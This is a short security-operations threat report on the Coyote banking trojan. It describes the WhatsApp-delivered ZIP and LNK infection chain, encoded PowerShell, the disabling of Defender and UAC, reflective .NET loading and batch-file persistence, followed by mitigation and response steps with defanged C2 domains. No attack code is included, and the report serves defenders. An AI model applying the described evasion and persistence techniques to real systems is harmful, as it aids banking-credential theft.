Coyote Banking Malware: SOC Threat Report

Security researchers identified that Coyote infections originate from malicious ZIP archives downloaded via web.whatsapp.com. Inside these archives, shortcut (LNK) files launch nested PowerShell commands encoded with Base64 and UTF-16LE, which retrieve scripts from zapgrande[.]com. The initial loader disables Microsoft Defender and UAC before deploying a .NET reflective loader that executes payloads directly in memory. Persistence is maintained via a batch file (“HealthApp-<GUID>.bat”) placed in the startup folder. The malware validates the victim’s Brazilian locale, enumerates browsers, and matches encrypted banking URLs through AES-CBC-GZIP routines. Code overlaps and encryption logic link Coyote to the Maverick Trojan family.

Coyote Trojan Mitigation

SOC teams should prioritize a layered defense strategy against Coyote’s infection chain. Organizations must restrict employee access to WhatsApp Web and similar messaging services, while implementing phishing-resistant awareness training. Deploy advanced endpoint detection and response (EDR) tools capable of identifying encoded PowerShell activity, reflective .NET loading, and unauthorized batch file creation. Block known C2 domains such as zapgrande[.]com and sorvetenopote[.]com, enforce strict PowerShell execution policies, and ensure antivirus signatures and behavioral rules are continuously updated to identify emerging variants.

Response to Coyote Bank Malware

Upon detection, incident responders should immediately isolate affected endpoints and initiate threat-hunting queries in Microsoft Defender for Endpoint or similar SIEM platforms to locate PowerShell executions stemming from WhatsApp downloads. Quarantine or delete LNK, ZIP, and batch files matching known IOCs, and block associated C2 infrastructure at firewall and DNS layers. Analysts should remove any HealthApp-*.bat persistence artifacts, reset compromised banking credentials, and enforce multi-factor authentication across financial platforms. Comprehensive forensic review is required to confirm removal of in-memory loaders and secondary payloads.